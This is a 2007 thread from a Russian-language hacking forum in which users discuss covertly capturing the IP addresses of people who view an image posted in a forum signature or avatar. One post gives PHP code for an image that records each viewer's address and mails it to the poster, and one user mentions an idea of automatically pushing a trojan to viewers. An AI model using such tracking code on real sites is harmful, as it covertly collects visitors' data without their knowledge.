ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.05.2007, 00:46
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Нет, не Xss, Ладно для уточнения так скажу, ты можеш забацать такуежу картинку чтобы она айпи опредиляла и коннект был с твоим серваком
 
Ответить с цитированием

  #12  
Старый 30.05.2007, 00:51
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию

Вы наконец поняли как узнать айпи хакера???Надо чтобы потом сразу же порты сканировались и авторутер запускался и потом логи по почте лучше бандеролью.
 
Ответить с цитированием

  #13  
Старый 30.05.2007, 00:55
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Надо чтобы потом сразу же порты сканировались
Ты писал как стеб, но меня на идею автоматического впаривания трояна появилась, но это потом
 
Ответить с цитированием

  #14  
Старый 30.05.2007, 01:01
yeti
Постоянный
Регистрация: 27.12.2006
Сообщений: 379
Провел на форуме:
1983988

Репутация: 1037
По умолчанию

Scipio, нее.. xss'ка - это другое.. там уже все куки прет же, и к томуже сниффер нужен. Это уже уязвимости юзает, а следовательно способ имеет ряд недостатков и неуниверсален. И он не тупо IPшник узнает.. так что.. делаем выводы сами..

ну вот к примеру, чтобы узнать Ip мы же не будем у булки(считается одним из самых безопасных форумов) искать уязвимости... Правильно? нам легче картинку залить. или ссылочку..
 
Ответить с цитированием

  #15  
Старый 30.05.2007, 01:02
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

ты это имелл ввиду?
Код:
<?php
Header("Content-type: image/png");
$string="$REMOTE_ADDR";
$tex="Scipio has your ip";
$img = ImageCreateFromPng("image.png");
$colr = ImageColorAllocate($img, 225, 225, 225);
mail("scipio@example.com", "log", $string);
ImageString($img,3,75,43, $tex,$colr);
ImagePng($img);
ImageDestroy($img);
?>
?
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #16  
Старый 30.05.2007, 01:04
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней
 
Ответить с цитированием

  #17  
Старый 30.05.2007, 01:05
yeti
Постоянный
Регистрация: 27.12.2006
Сообщений: 379
Провел на форуме:
1983988

Репутация: 1037
По умолчанию

Scipio, один из методов по сути..
 
Ответить с цитированием

  #18  
Старый 30.05.2007, 01:07
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sandjuro  
Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней
Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей

так почту бомбить можно было бы...
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 30.05.2007 в 01:09..
 
Ответить с цитированием

  #19  
Старый 30.05.2007, 01:09
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
Сообщение от Scipio  
Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей
Ок, а если аватарка, загрузить её с помощью веб ссылки...Хотя нет, с аватакой может и не прокатить, там уже примудрости в том что она загрузится, или если указывать ссылку на аватарку то она не грузится на серв где форум?
в любом случии не обезательно на почту, лучше в лог, а то отписавшись в популярной теме с просмотрами в 1000, хуже спама будет.
Можеш тут юзнуть этот способ?
 
Ответить с цитированием

  #20  
Старый 30.05.2007, 01:29
yeti
Постоянный
Регистрация: 27.12.2006
Сообщений: 379
Провел на форуме:
1983988

Репутация: 1037
По умолчанию

Scipio, впринципе.. даже самый простенький фаер не позволит долбиться чему-либо непонятному на SMTP.. но ведь форум - это форум.. хотя у хостера вроде фаеры стоят. нет.. лучше сделать тупо на хостинг..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Эксплойт для брута phpBB Voyageur Форумы 0 02.06.2006 03:12
Скрипт Perl: Узнавалка версии phpBB DetMyl PHP, PERL, MySQL, JavaScript 4 14.02.2006 00:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ